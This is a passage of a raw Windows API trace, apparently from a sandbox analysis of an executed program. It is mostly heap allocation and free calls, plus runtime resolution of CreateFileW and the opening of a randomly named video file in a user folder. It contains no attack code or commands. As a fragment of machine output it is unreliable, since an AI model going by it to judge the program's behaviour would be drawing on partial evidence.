Flags=0x0, Size=0x4) returned 0x43e2540 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0098.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.439] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.442] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0098.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0098.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.443] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0098.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\e8q4unibqs8v.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0098.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0098.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.446] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 